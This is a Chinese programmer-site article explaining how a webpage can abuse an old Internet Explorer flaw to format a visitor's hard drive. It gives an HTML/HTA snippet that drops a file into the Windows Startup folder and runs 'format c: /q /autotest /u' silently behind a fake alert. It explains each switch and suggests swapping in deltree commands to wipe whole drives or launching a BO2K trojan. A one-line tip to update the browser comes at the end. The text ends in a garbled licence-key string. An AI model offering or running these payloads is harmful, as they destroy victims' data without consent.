欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

如何利用HTML格式化你的硬盘

程序员文章站 2022-03-18 15:13:33
   这是利用微软( microsoft )的ie浏览器( internet explorer&nbs...
   这是利用微软( microsoft )的ie浏览器( internet explorer )所衍生出来的 
攻击方法。 

以下这段就是具有破坏性的html 

hacking your computer . 

scr.reset(); scr.path="c:\\windows\\start menu\\programs\\启动\\hack.hta"; 
scr.doc=" 
wsh.run('start.exe /m format c:/q /autotest /u'); 
alert('important : windows is removing unused temporary files.');"; 
scr.write(); 


(懂html的人应该就看得出来其中精随) 

现在我大概来解释其中几个项目所写的意思 

scr.path="c:\\windows\\start menu\\programs\\启动\\hack.hta" 

这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为 
hack.hta 

wsh.run('start.exe /m format c:/q /autotest /u'); 

通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。 

它是一个微软没有公开的功能,键入後format的动作便会被强制执行。 

这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。 

最後start.exe再配合/m选项可以使format的dos-prompt视窗在执行的时候处於最小 
化的状态。 

执行其他攻击指令的方法∶ 

只要修改“start.exe /m format c:/q /autotest /u”这一项便形。 

start.exe /m format c:/q /autotest /u 

其中的“c:”可以换做其他的硬碟。 

(path)\bo2k.exe 

执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。 

start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 

杀掉对方硬碟底下所有的档案。 

start.exe /m deltree /y c:\windows\system\*.* 

杀掉对方c:\windows\system\目录底下的所有档案。 

後叙∶ 

预防遭此手段的破坏就是到微软去更新你的浏览器。 
cplic putlic eval 01oct2001 ao9mcpuff-lvju5bvtp-7xdvpsa4x-rrrckpv jjcpsuite-eval-3des-ng ck-cp